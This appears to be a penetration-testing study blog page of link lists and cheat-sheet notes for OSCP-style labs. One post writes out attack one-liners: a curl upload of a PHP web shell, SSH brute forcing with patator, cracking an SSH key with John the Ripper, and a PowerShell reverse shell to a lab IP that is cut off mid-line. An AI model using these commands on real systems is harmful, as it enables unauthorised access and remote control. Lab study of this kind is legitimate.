Skip to main content

Posts

Showing posts from May, 2019

Scripts -- Links

1) DNS lookup Bash Script 2) SMBServer - For Data Transfer in Windows 3) Linux Recon Script -- Useful for Priv Esc as well as finding passwords of other users 4) Many Scripts  Available Here 5) Auto Recon --> OSCP reconnaissance  6) Windows Priv Escalation - Powerless   Power up 7) Screen Recorder for Linux - OBS Studio 8) Privilege Escalation Workshop Guide 9) Learn Wfuzz Package         Call without a sim   1. https://tox.chat 2. https://www.linphone.org 3. https://jitsi.org 4. https://www.ringcentral.com 5. https://www.mumble.  

Exploitation

CTF --> Pawnable.kr 1) Binary Exploitation Basics 2) Binary Exploit 3) Online Hash Decrypter -- NTLM/WPA/PDF.. 4) XSS Payloads   Put a file using CURL curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://10.10.10.10/test/shell.php Brute Force SSH: patator ssh_login host=10.10.10.76 port=22 user=someone password=FILE0 0=probable-v2-top1575.txt persistent=0 https://github.com/lanjelot/patator.git Brute Forcing id_rsa using JohnTheRipper: sshng2john id_rsa john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt chmod +x id_rsa ssh -i id_rsa bhanu@10.10.10.10  Bruteforcing using Hashcat: hashcat --example-hashes //Gives out all the hashes list, select the mode and use it after -m cewl 10.10.10.46 > wordlist.txt --> Create a Word list based on the files/words/links available in the web page Windows Reverse Shell $client = New-Object System.Net.Sockets.TCPClient("10.10.14.6",9001);$stream = $client.GetStre

Malware Analysis

3Interview Questions 1) Top 30 Malware Analyst Interview Questions and Answers for 2018 2) rshipp/awesome-malware-analysis: A curated list of awesome malware analysis tools and resources. 3) Malware analyst interview questions with detailed answers (Part 1) 4) Malware analyst interview questions with detailed answers (Part 2) 5) Malware analyst interview questions with detailed answers (Part 3) 6) Practical Malware Analysis PDF 7) SANS White Paper on Introduction to Malware Analysis 8) Hunting File less Malware 9) Reverse Engineering Wanna Cry PE Header Cheat Sheet Sans White papers on Malicious Code Linux File Format - Executable and Linkable Format Other Stuff 1) Demystifying Malware Traffic 2) Random IP Lookups 3) Analyzing BIOS protection against UEFI Rootkit

Links

1)      Lot of Data on Forensics 2)      Linux Privilege Escalation using SUID Binaries 3)      Web Application Pen-testing Tutorials With Mutillidae (Hacking Illustrated Series InfoSec Tutorial Videos) 4)      Penetration Testing Framework 0.59 5)      OSCP Preparation  6)      AD Penetration Explanation 7)      {Refer}       Assembly Programming I       Part II       Part III 8)      Assembly Lab Setup    Assembly Intro      Assembly I        Assembly II   9)      Linux Buffer Overflow Intro     Buffer Overflow Part II     Buffer Overflow III 10)   Malware Development  -->  Malware Development Part 1   11)   Mobile Pentesting 12) 59 Hosts to Glory 13) JavaScript For Pentesters Bookmarks: Windows Checklist Linux Checklist Windows - Priv Esc Techniques Windows - Priv Esc Techniques II Pivoting Dumping Windows Creds General https://www.exploit-db.com/ https://github.com/g0tmi1k/SecLists https://github.com/swis